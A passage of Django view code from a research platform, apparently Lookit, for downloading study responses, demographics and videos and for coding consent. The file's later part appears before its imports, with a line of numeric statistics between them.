if d.frame_id.partition("-")[2] == frame_id and d.event_number == ""
}
if frame_id in unique_frame_keys_dict:
unique_frame_keys_dict[frame_id] = (
unique_frame_keys_dict[frame_id] | these_keys
)
else:
unique_frame_keys_dict[frame_id] = these_keys
# Start with general descriptions of high-level headers (child_id, response_id, etc.)
writer.writerows(
[
{"column": header, "description": description}
for (header, description) in FRAME_DATA_HEADER_DESCRIPTIONS.items()
]
)
writer.writerow(
{
"possible_frame_id": "global",
"frame_description": "Data not associated with a particular frame",
}
)
# Add placeholders to describe each frame type
unique_frame_ids = sorted(list(unique_frame_ids))
for frame_id in unique_frame_ids:
writer.writerow(
{
"possible_frame_id": "*-" + frame_id,
"frame_description": "RESEARCHER: INSERT FRAME DESCRIPTION",
}
)
unique_frame_keys = sorted(list(unique_frame_keys_dict[frame_id]))
for k in unique_frame_keys:
writer.writerow(
{
"possible_frame_id": "*-" + frame_id,
"possible_key": k,
"key_description": "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS KEY MEANS IN THIS FRAME",
}
)
event_keys = sorted(list(event_keys))
event_key_stock_descriptions = {
"eventType": (
"Descriptor for this event; determines what other data is available. Global event 'exitEarly' records "
"cases where the participant attempted to exit the study early by closing the tab/window or pressing F1 "
"or ctrl-X. RESEARCHER: INSERT DESCRIPTIONS OF PARTICULAR EVENTTYPES USED IN YOUR STUDY. (Note: you can "
"find a list of events recorded by each frame in the frame documentation at "
"https://lookit.github.io/ember-lookit-frameplayer, under the Events header.)"
),
"exitType": (
"Used in the global event exitEarly. Only value stored at this point is 'browserNavigationAttempt'"
),
"lastPageSeen": (
"Used in the global event exitEarly. Index of the frame the participant was on before exit attempt."
),
"pipeId": (
"Recorded by any event in a video-capture-equipped frame. Internal video ID used by Pipe service; only "
"useful for troubleshooting in rare cases."
),
"streamTime": (
"Recorded by any event in a video-capture-equipped frame. Indicates time within webcam "
"video (videoId) to nearest 0.1 second. If recording has not started yet, may be 0 or null."
),
"timestamp": "Recorded by all events. Timestamp of event in format e.g. 2019-11-07T17:14:43.626Z",
"videoId": (
"Recorded by any event in a video-capture-equipped frame. Filename (without .mp4 extension) of video "
"currently being recorded."
),
}
for k in event_keys:
writer.writerow(
{
"possible_frame_id": "any (event data)",
"possible_key": k,
"key_description": event_key_stock_descriptions.get(
k, "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS EVENT KEY MEANS"
),
}
)
def build_single_response_framedata_csv(response):
"""
Builds CSV file contents for frame-level data from a single response. Used for both
building zip archive of all response data & offering individual-file downloads on individual responses view.
"""
this_resp_data = get_frame_data(response)
output, writer = csv_namedtuple_writer(FrameDataRow)
writer.writerows(this_resp_data)
return output.getvalue()
class ResponseDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
model = Response
paginate_by = 10
ordering = "id"
def get_queryset(self):
study = self.study
return study.responses_for_researcher(self.request.user).order_by(
self.get_ordering()
)
class DemographicDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
model = Response
paginate_by = 10
ordering = "id"
def get_queryset(self):
study = self.study
return (
study.responses_for_researcher(self.request.user)
.order_by(self.get_ordering())
.select_related("child", "child__user", "study", "demographic_snapshot")
.values(
"uuid",
"date_created",
"child__user__uuid",
"study__uuid",
"study__salt",
"study__hash_digits",
"demographic_snapshot__uuid",
"demographic_snapshot__created_at",
"demographic_snapshot__number_of_children",
"demographic_snapshot__child_birthdays",
"demographic_snapshot__languages_spoken_at_home",
"demographic_snapshot__number_of_guardians",
"demographic_snapshot__number_of_guardians_explanation",
"demographic_snapshot__race_identification",
"demographic_snapshot__age",
"demographic_snapshot__gender",
"demographic_snapshot__education_level",
"demographic_snapshot__spouse_education_level",
"demographic_snapshot__annual_income",
"demographic_snapshot__number_of_books",
"demographic_snapshot__additional_comments",
"demographic_snapshot__country",
"demographic_snapshot__state",
"demographic_snapshot__density",
"demographic_snapshot__lookit_referrer",
"demographic_snapshot__extra",
)
)
class StudyResponsesList(ResponseDownloadMixin, generic.ListView):
"""
View to display a list of study responses.
"""
template_name = "studies/study_responses.html"
def get_ordering(self):
"""
Determine sort field and order. Sorting on id actually sorts on child id, not response id.
Sorting on status, actually sorts on 'completed' field, where we are alphabetizing
"in progress" and "completed"
"""
orderby = self.request.GET.get("sort", "id")
return orderby.replace("id", "child__id").replace("status", "completed")
def get_queryset(self):
return (
super()
.get_queryset()
.prefetch_related(
"consent_rulings__arbiter",
Prefetch(
"feedback",
queryset=Feedback.objects.select_related("researcher").order_by(
"-id"
),
),
)
)
def get_context_data(self, **kwargs):
"""
In addition to the study, adds several items to the context dictionary. Study results
are paginated.
"""
context = super().get_context_data(**kwargs)
context["study"] = study = self.study
paginated_responses = context["object_list"]
columns_included_in_summary = study.columns_included_in_summary()
columns_included_in_table = [
"child__hashed_id",
"response__uuid",
"response__id",
"response__status",
"response__completed",
"response__is_preview",
]
response_data = []
for resp in paginated_responses:
# Info needed for table display of individual responses
this_resp_data = {
col.id: col.extractor(resp)
for col in RESPONSE_COLUMNS
if col.id in columns_included_in_table
}
# Exception - store actual date object for date created
this_resp_data["response__date_created"] = resp.date_created
# info needed for summary table shown at right
this_resp_data["summary"] = [
{
"name": col.name,
"value": col.extractor(resp),
"description": col.description,
}
for col in RESPONSE_COLUMNS
if col.id in columns_included_in_summary
]
this_resp_data["videos"] = resp.videos.values("pk", "full_name")
for v in this_resp_data["videos"]:
v["display_name"] = (
v["full_name"]
.replace("videoStream_{}_".format(study.uuid), "...")
.replace("_{}_".format(resp.uuid), "...")
)
response_data.append(this_resp_data)
context["response_data"] = response_data
context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
context["can_edit_feedback"] = self.request.user.has_study_perms(
StudyPermission.EDIT_STUDY_FEEDBACK, context["study"]
)
return context
def build_video_display_name(self, study_uuid, response_uuid, vid_name):
"""
Strips study_uuid and response_uuid out of video responses titles for better display.
"""
return ". . ." + ". . .".join(
vid_name.split(study_uuid + "_")[1].split("_" + response_uuid + "_")
)
class StudySingleResponseDownload(ResponseDownloadMixin, View):
"""
Download a single study response in the selected format with selected headers.
"""
def get(self, *args, **kwargs):
data_type = self.request.GET.get("data-type-selector", None)
if data_type not in ["json", "csv", "framedata"]:
raise SuspiciousOperation
response_id = self.request.GET.get("response_id", None)
try:
resp = self.get_queryset().get(pk=response_id)
except ObjectDoesNotExist:
raise SuspiciousOperation
study = self.study
header_options = set(self.request.GET.getlist("data_options"))
extension = "json" if data_type == "json" else "csv"
filename = "{}_{}{}.{}".format(
study_name_for_files(study.name),
str(resp.uuid),
"_frames"
if data_type == "json"
else "_identifiable"
if IDENTIFIABLE_DATA_HEADERS & header_options
else "",
extension,
)
if data_type == "json":
cleaned_data = json.dumps(
construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
indent="\t",
default=str,
)
elif data_type == "csv":
row_data = flatten_dict(
{col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
)
header_list = get_response_headers(header_options, row_data.keys())
output, writer = csv_dict_output_and_writer(header_list)
writer.writerow(row_data)
cleaned_data = output.getvalue()
elif data_type == "framedata":
cleaned_data = build_single_response_framedata_csv(resp)
else:
raise SuspiciousOperation
response = HttpResponse(cleaned_data, content_type="text/{}".format(extension))
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponseVideoAttachment(
ResearcherLoginRequiredMixin, UserPassesTestMixin, StudyLookupMixin, View
):
"""
View that redirects to a requested video for a study response.
"""
raise_exception = True
@cached_property
def video(self):
# Only select the video from consented videos for this study
return self.study.videos_for_consented_responses.get(
pk=self.kwargs.get("video")
)
def can_view_this_video(self):
user = self.request.user
study = self.study
video = self.video
return user.is_researcher and (
(
user.has_study_perms(StudyPermission.READ_STUDY_RESPONSE_DATA, study)
and not video.response.is_preview
)
or (
user.has_study_perms(StudyPermission.READ_STUDY_PREVIEW_DATA, study)
and video.response.is_preview
)
)
test_func = can_view_this_video
def get(self, request, *args, **kwargs):
video = self.video
download_url = video.download_url
if self.request.GET.get("mode") == "download":
r = requests.get(download_url)
response = FileResponse(
File.open(io.BytesIO(r.content)),
filename=video.filename,
as_attachment=True,
)
return response
return redirect(download_url)
class StudyResponseSubmitFeedback(StudyLookupMixin, UserPassesTestMixin, View):
"""
View to create or edit response feedback.
"""
def user_can_edit_feedback(self):
user = self.request.user
study = self.study
# First check user has permission to be editing feedback from this study at all
if not user.is_researcher and user.has_study_perms(
StudyPermission.EDIT_STUDY_FEEDBACK, study
):
return False
# Check that the feedback_id (if given) is from this study
feedback_id = self.request.POST.get("feedback_id", None)
if feedback_id:
try:
feedback = Feedback.objects.get(id=feedback_id)
except ObjectDoesNotExist:
return False
if feedback.response.study_id != study.pk:
return False
# Check that the response_id (if given) is from this study
response_id = self.request.POST.get("response_id", None)
if response_id:
try:
response = Response.objects.get(id=int(response_id))
except ObjectDoesNotExist:
return False
if response.study_id != study.pk:
return False
return True
test_func = user_can_edit_feedback
def post(self, request, *args, **kwargs):
"""
Create or edit feedback. Pass feedback_id to edit existing feedback, or response_id to create new
feedback for that response.
"""
form_data = self.request.POST
user = self.request.user
study = self.study
feedback_id = form_data.get("feedback_id", None)
comment = form_data.get("comment", "")
if feedback_id:
Feedback.objects.filter(id=feedback_id).update(comment=comment)
else:
response_id = int(form_data.get("response_id"))
Feedback.objects.create(
response_id=response_id, researcher=user, comment=comment
)
return HttpResponseRedirect(
reverse("exp:study-responses-list", kwargs=dict(pk=study.pk))
)
class StudyResponsesConsentManager(
ResearcherLoginRequiredMixin,
UserPassesTestMixin,
SingleObjectFetchProtocol[Study],
generic.DetailView,
):
"""Manage consent videos from here: approve or reject as evidence of informed consent."""
template_name = "studies/study_responses_consent_ruling.html"
queryset = Study.objects.all()
raise_exception = True
def user_can_code_consent(self):
user = self.request.user
study = self.get_object()
return user.is_researcher and (
user.has_study_perms(StudyPermission.CODE_STUDY_CONSENT, study)
or user.has_study_perms(StudyPermission.CODE_STUDY_PREVIEW_CONSENT, study)
)
test_func = user_can_code_consent
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Need to prefetch our responses with consent-footage videos.
study = context["study"]
# TODO: technically should not grant access to consent videos for preview data unless has that perm
# (or should clearly indicate that code_study_consent means preview + actual data)
preview_only = not self.request.user.has_study_perms(
StudyPermission.CODE_STUDY_CONSENT, study
)
responses = get_responses_with_current_rulings_and_videos(
study.id, preview_only
)
context["loaded_responses"] = responses
context["summary_statistics"] = get_consent_statistics(study.id, preview_only)
# Using a map for arbitrarily structured data - lists and objects that we can't just trivially shove onto
# data-* properties in HTML
response_key_value_store = {}
paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
# two jobs - generate statistics and populate k/v store.
for response in page_of_responses:
response_json = response_key_value_store[str(response["uuid"])] = {}
response["uuid"] = str(response.pop("uuid"))
response_json["videos"] = response.pop("videos")
response_json["details"] = {
"general": {
"uuid": response["uuid"],
"global_event_timings": json.dumps(
response.pop("global_event_timings")
),
"sequence": json.dumps(response.pop("sequence")),
"completed": json.dumps(response.pop("completed")),
"date_created": str(response["date_created"]),
},
"participant": {
"hashed_id": hash_participant_id(response),
"uuid": str(response.pop("child__user__uuid")),
"nickname": response.pop("child__user__nickname"),
},
"child": {
"hashed_id": hash_child_id(response),
"uuid": str(response.pop("child__uuid")),
"name": response.pop("child__given_name"),
"birthday": str(response.pop("child__birthday")),
"gender": response.pop("child__gender"),
"additional_information": response.pop(
"child__additional_information"
),
},
}
# TODO: Use json_script template tag to create JSON that can be used in Javascript
# (see https://docs.djangoproject.com/en/3.0/ref/templates/builtins/#json-script)
context["response_key_value_store"] = json.dumps(response_key_value_store)
return context
def post(self, request, *args, **kwargs):
"""This is where consent rulings are submitted."""
form_data = self.request.POST
user = self.request.user
study = self.get_object()
preview_only = not self.request.user.has_study_perms(
StudyPermission.CODE_STUDY_CONSENT, study
)
# Only allow any action on preview responses unless full perms
responses = study.responses
if preview_only:
responses = responses.filter(is_preview=True)
comments = json.loads(form_data.get("comments"))
# We now accept pending rulings to reverse old reject/approve decisions.
for ruling in ("accepted", "rejected", "pending"):
judged_responses = responses.filter(uuid__in=form_data.getlist(ruling))
for response in judged_responses:
response.consent_rulings.create(
action=ruling,
arbiter=user,
comments=comments.pop(str(response.uuid), None),
)
response.save()
# if there are any comments left over, these will count as new rulings that are the same as the last.
if comments:
for resp_uuid, comment in comments.items():
response = responses.get(uuid=resp_uuid)
response.consent_rulings.create(
action=response.most_recent_ruling, arbiter=user, comments=comment
)
return HttpResponseRedirect(
reverse(
"exp:study-responses-consent-manager",
kwargs=dict(pk=self.get_object().pk),
)
)
def get(self, request, *args, **kwargs):
if self.get_object().study_type.is_external:
messages.error(request, "There is no consent manager for external studies.")
return HttpResponseRedirect(reverse("exp:study-detail", kwargs=kwargs))
else:
return super().get(request, *args, **kwargs)
class StudyResponsesAll(
CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
"""
StudyResponsesAll shows a variety of download options for response and child data
from a given study. (It does not actually show any data.)
"""
template_name = "studies/study_responses_all.html"
queryset = Study.objects.all()
http_method_names = ["get"]
def get_context_data(self, **kwargs):
"""
In addition to the study, adds several items to the context dictionary.
"""
context = super().get_context_data(**kwargs)
context["n_responses"] = (
context["study"].responses_for_researcher(self.request.user).count()
)
context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
context["can_delete_preview_data"] = self.request.user.has_study_perms(
StudyPermission.DELETE_ALL_PREVIEW_DATA, context["study"]
)
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
return context
class StudyDeletePreviewResponses(
ResearcherLoginRequiredMixin,
UserPassesTestMixin,
SingleObjectFetchProtocol[Study],
SingleObjectMixin,
View,
):
queryset = Study.objects.all()
def user_can_delete_preview_data(self):
user = self.request.user
study = self.get_object()
return user.is_researcher and user.has_study_perms(
StudyPermission.DELETE_ALL_PREVIEW_DATA, study
)
test_func = user_can_delete_preview_data
def post(self, request, *args, **kwargs):
"""
Post method on all responses view handles the 'delete all preview data' button.
"""
study = self.get_object()
# Note: delete all, not just consented!
preview_responses = study.responses.filter(is_preview=True).prefetch_related(
"videos", "responselog_set", "consent_rulings", "feedback"
)
paginator = Paginator(preview_responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
# response logs, consent rulings, feedback, videos will all be deleted
# via cascades - videos will be removed from S3 also on pre_delete hook
resp.delete()
return HttpResponseRedirect(
reverse("exp:study-responses-all", kwargs={"pk": study.id})
)
class StudyResponsesJSON(ResponseDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads all study responses in JSON format.
"""
# Smaller pagination because individual responses may be large and we don't want the json representing 100
# responses in memory
paginate_by = 1
def make_chunk(self, paginator, page_num, header_options):
chunk = ""
if page_num == 1:
chunk = "[\n"
chunk += ",\n".join(
json.dumps(
construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
indent="\t", # Use tab rather than spaces to make file smaller (ex. 60MB -> 25MB)
default=str,
)
for resp in paginator.page(page_num)
)
if page_num == paginator.page_range[-1]:
chunk += "\n]"
else:
chunk += ",\n"
return chunk
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
header_options = set(self.request.GET.getlist("data_options"))
filename = "{}_{}.json".format(
study_name_for_files(study.name),
"all-responses"
+ ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
)
response = StreamingHttpResponse(
(
self.make_chunk(paginator, page_num, header_options)
for page_num in paginator.page_range
),
content_type="text/json",
)
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesCSV(ResponseDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads a summary of all study responses in CSV format.
"""
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
headers = set()
session_list = []
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = flatten_dict(
{col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
)
# Add any new headers from this session
headers = headers | row_data.keys()
session_list.append(row_data)
header_options = set(self.request.GET.getlist("data_options"))
header_list = get_response_headers(header_options, headers)
output, writer = csv_dict_output_and_writer(header_list)
writer.writerows(session_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name),
"all-responses"
+ ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesDictCSV(CanViewStudyResponsesMixin, View):
"""
Hitting this URL downloads a data dictionary for the study response summary in CSV format. Does not depend on actual response data.
"""
def build_summary_dict_csv(self, optional_headers_selected_ids):
"""
Builds CSV file contents for data dictionary corresponding to the overview CSV
"""
descriptions = {col.id: col.description for col in RESPONSE_COLUMNS}
header_list = get_response_headers(
optional_headers_selected_ids, descriptions.keys()
)
all_descriptions = [
{"column": header, "description": descriptions[header]}
for header in header_list
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
return output.getvalue()
def get(self, request, *args, **kwargs):
study = self.study
header_options = self.request.GET.getlist("data_options")
cleaned_data = self.build_summary_dict_csv(header_options)
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-responses-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyChildrenCSV(ResponseDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads a summary of all children who participated in CSV format.
"""
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
child_list = []
session_list = []
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = flatten_dict(
{
col.id: col.extractor(resp)
for col in RESPONSE_COLUMNS
if col.id in CHILD_CSV_HEADERS
}
)
if row_data["child__global_id"] not in child_list:
child_list.append(row_data["child__global_id"])
session_list.append(row_data)
output, writer = csv_dict_output_and_writer(CHILD_CSV_HEADERS)
writer.writerows(session_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-children-identifiable"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyChildrenDictCSV(CanViewStudyResponsesMixin, View):
"""
Hitting this URL downloads a data dictionary in CSV format for the summary of children who participated.
Does not depend on actual response data.
TODO: separate from response data mixin
"""
def build_child_dict_csv(self):
"""
Builds CSV file contents for data dictionary for overview of all child participants
"""
all_descriptions = [
{"column": col.id, "description": col.description}
for col in RESPONSE_COLUMNS
if col.id in CHILD_CSV_HEADERS
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
return output.getvalue()
def get(self, request, *args, **kwargs):
study = self.study
cleaned_data = self.build_child_dict_csv()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-children-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesFrameDataCSV(ResponseDownloadMixin, generic.list.ListView):
"""Hitting this URL downloads a ZIP file with frame data from one response per file in CSV format"""
# TODO: with large files / many responses generation can take a while. Should generate asynchronously along
# with the data dict.
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
if study.study_type.is_external:
messages.error(
self.request, "Frame data is not available for External Studies."
)
return redirect(reverse("exp:study-responses-all", kwargs={"pk": study.pk}))
zipped_file = io.BytesIO() # import io
with zipfile.ZipFile(zipped_file, "w", zipfile.ZIP_DEFLATED) as zipped:
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
data = build_single_response_framedata_csv(resp)
filename = "{}_{}_{}.csv".format(
study_name_for_files(study.name), resp.uuid, "frames"
)
zipped.writestr(filename, data)
zipped_file.seek(0)
response = FileResponse(
zipped_file,
as_attachment=True,
filename="{}_framedata_per_session.zip".format(
study_name_for_files(study.name)
),
)
return response
class StudyResponsesFrameDataDictCSV(ResponseDownloadMixin, View):
"""
Hitting this URL queues creation of a template data dictionary for frame-level data in CSV format.
The file is put on GCP and a link is emailed to the user.
"""
def get(self, request, *args, **kwargs):
study = self.study
if study.study_type.is_external:
messages.error(
request, "Frame data dictionary is not available for external studies"
)
else:
filename = "{}_{}_{}".format(
study_name_for_files(study.name), study.uuid, "all-frames-dict"
)
build_framedata_dict.delay(filename, study.uuid, self.request.user.uuid)
messages.success(
request,
f"A frame data dictionary for {study.name} is being generated. You will be emailed a link when it's completed.",
)
return HttpResponseRedirect(
reverse("exp:study-responses-all", kwargs=self.kwargs)
)
class StudyDemographics(
CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
"""
StudyDemographics view shows participant demographic snapshots associated
with each response to the study
"""
template_name = "studies/study_demographics.html"
queryset = Study.objects.all()
def get_context_data(self, **kwargs):
"""
Adds information for displaying how many and which types of responses are available.
"""
context = super().get_context_data(**kwargs)
context["n_responses"] = (
context["study"].responses_for_researcher(self.request.user).count()
)
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
return context
class StudyDemographicsJSON(DemographicDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads all participant demographics in JSON format.
"""
def render_to_response(self, context, **response_kwargs):
study = self.study
header_options = self.request.GET.getlist("demo_options")
json_responses = []
paginator = context["paginator"]
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
json_responses.append(
json.dumps(
construct_response_dictionary(
resp,
DEMOGRAPHIC_COLUMNS,
header_options,
include_exp_data=False,
),
indent="\t",
default=str,
)
)
cleaned_data = f"[ {', '.join(json_responses)} ]"
filename = "{}_{}.json".format(
study_name_for_files(study.name), "all-demographic-snapshots"
)
response = HttpResponse(cleaned_data, content_type="text/json")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyDemographicsCSV(DemographicDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads all participant demographics in CSV format.
"""
def render_to_response(self, context, **response_kwargs):
study = self.study
paginator = context["paginator"]
header_options = set(self.request.GET.getlist("demo_options"))
participant_list = []
headers_for_download = get_demographic_headers(header_options)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = {col.id: col.extractor(resp) for col in DEMOGRAPHIC_COLUMNS}
participant_list.append(row_data)
output, writer = csv_dict_output_and_writer(headers_for_download)
writer.writerows(participant_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-demographic-snapshots"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyDemographicsDictCSV(DemographicDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads a data dictionary for participant demographics in in CSV format.
Does not depend on any actual data.
"""
def render_to_response(self, context, **response_kwargs):
header_options = set(self.request.GET.getlist("demo_options"))
headers_for_download = get_demographic_headers(header_options)
all_descriptions = [
{"column": col.id, "description": col.description}
for col in DEMOGRAPHIC_COLUMNS
if col.id in headers_for_download
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(self.study.name), "all-demographic-snapshots-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyCollisionCheck(ResponseDownloadMixin, View):
"""
Hitting this URL checks for collisions among all child and account hashed IDs, and returns a string describing
any collisions (empty string if none).
"""
def get(self, request, *args, **kwargs):
study = self.study
responses = (
study.consented_responses.order_by("id")
.select_related("child", "child__user", "study")
.values(
"uuid",
"child__uuid",
"child__user__uuid",
"study__uuid",
"study__salt",
"study__hash_digits",
)
)
child_dict = {}
account_dict = {}
collision_text = ""
# Note: could also just check number of unique global vs. hashed IDs in full dataset;
# only checking one-by-one for more informative output.
paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
participant_hashed_id = hash_participant_id(resp)
participant_global_id = resp["child__user__uuid"]
child_hashed_id = hash_child_id(resp)
child_global_id = resp["child__uuid"]
if participant_hashed_id in account_dict:
if participant_global_id != account_dict[participant_hashed_id]:
collision_text += "Participant hashed ID {} ({}, {})\n".format(
participant_hashed_id,
account_dict[participant_hashed_id],
participant_global_id,
)
else:
account_dict[participant_hashed_id] = participant_global_id
if child_hashed_id in child_dict:
if child_global_id != child_dict[child_hashed_id]:
collision_text += "Child hashed ID {} ({}, {})<br>".format(
child_hashed_id,
child_dict[child_hashed_id],
child_global_id,
)
else:
child_dict[child_hashed_id] = child_global_id
return JsonResponse({"collisions": collision_text})
class StudyAttachments(CanViewStudyResponsesMixin, generic.ListView):
"""
StudyAttachments View shows video attachments for the study
"""
template_name = "studies/study_attachments.html"
model = Video
paginate_by = 100
def get_ordering(self):
return self.request.GET.get("sort", "-created_at") or "-created_at"
def get_queryset(self):
"""Fetches all consented videos this user has access to.
Returns:
QuerySet: all videos from this study where response has been marked as
consented and response is of a type (preview/actual data) that user can view
Todo:
* use a helper (e.g. in queries) select_videos_for_user to fetch the
appropriate videos here and in build_zipfile_of_videos - deferring for the moment
to work out dependencies.
"""
study = self.study
videos = study.videos_for_consented_responses
if not self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, study
):
videos = videos.filter(response__is_preview=True)
if not self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, study
):
videos = videos.filter(response__is_preview=False)
match = self.request.GET.get("match", "")
if match:
videos = videos.filter(full_name__icontains=match)
return videos.order_by(self.get_ordering())
def get_context_data(self, **kwargs):
"""
In addition to the study, adds several items to the context dictionary. Study results
are paginated.
"""
context = super().get_context_data(**kwargs)
context["match"] = self.request.GET.get("match", "")
context["study"] = self.study
return context
def post(self, request, *args, **kwargs):
"""
Downloads study video
"""
match = self.request.GET.get("match", "")
study = self.study
if self.request.POST.get("all-attachments"):
build_zipfile_of_videos.delay(
f"{study.uuid}_videos",
study.uuid,
match,
self.request.user.uuid,
consent_only=False,
)
messages.success(
request,
f"An archive of videos for {study.name} is being generated. You will be emailed a link when it's completed.",
)
if self.request.POST.get("all-consent-videos"):
build_zipfile_of_videos.delay(
f"{study.uuid}_consent_videos",
study.uuid,
match,
self.request.user.uuid,
consent_only=True,
)
messages.success(
request,
f"An archive of consent videos for {study.name} is being generated. You will be emailed a link when it's completed.",
)
return HttpResponseRedirect(
reverse("exp:study-attachments", kwargs=self.kwargs)
)
| 40.529175 | 135 | 0.624957 | import io
import json
import zipfile
from functools import cached_property
from typing import Callable, Dict, KeysView, List, NamedTuple, Set, Union
import requests
from django.contrib import messages
from django.contrib.auth.mixins import UserPassesTestMixin
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.core.files import File
from django.core.paginator import Paginator
from django.db.models import Prefetch
from django.http import (
FileResponse,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
StreamingHttpResponse,
)
from django.shortcuts import redirect, reverse
from django.views import generic
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.list import MultipleObjectMixin
from accounts.utils import (
hash_child_id,
hash_demographic_id,
hash_id,
hash_participant_id,
)
from exp.utils import (
RESPONSE_PAGE_SIZE,
csv_dict_output_and_writer,
csv_namedtuple_writer,
flatten_dict,
round_age,
round_ages_from_birthdays,
study_name_for_files,
)
from exp.views.mixins import (
CanViewStudyResponsesMixin,
ResearcherLoginRequiredMixin,
SingleObjectFetchProtocol,
StudyLookupMixin,
)
from studies.models import Feedback, Response, Study, Video
from studies.permissions import StudyPermission
from studies.queries import (
get_consent_statistics,
get_responses_with_current_rulings_and_videos,
)
from studies.tasks import build_framedata_dict, build_zipfile_of_videos
class ResponseDataColumn(NamedTuple):
id: str
description: str
extractor: Callable[
[Union[Response, Dict]], Union[str, List]
]
optional: bool = False
name: str = ""
include_by_default: bool = False
identifiable: bool = False
RESPONSE_COLUMNS = [
ResponseDataColumn(
id="response__id",
description="Short ID for this response",
extractor=lambda resp: str(resp.id),
name="Response ID",
),
ResponseDataColumn(
id="response__uuid",
description="Unique identifier for response. Can be used to match data to video filenames.",
extractor=lambda resp: str(resp.uuid),
name="Response UUID",
),
ResponseDataColumn(
id="response__date_created",
description="Timestamp for when participant began session, in format e.g. 2019-11-07 17:13:38.702958+00:00",
extractor=lambda resp: str(resp.date_created),
name="Date created",
),
ResponseDataColumn(
id="response__completed",
description=(
"Whether the participant submitted the exit survey; depending on study criteria, this may not align "
"with whether the session is considered complete. E.g., participant may have left early but submitted "
"exit survey, or may have completed all test trials but not exit survey."
),
extractor=lambda resp: resp.completed,
name="Completed",
),
ResponseDataColumn(
id="response__withdrawn",
description=(
"Whether the participant withdrew permission for viewing/use of study video beyond consent video. If "
"true, video will not be available and must not be used."
),
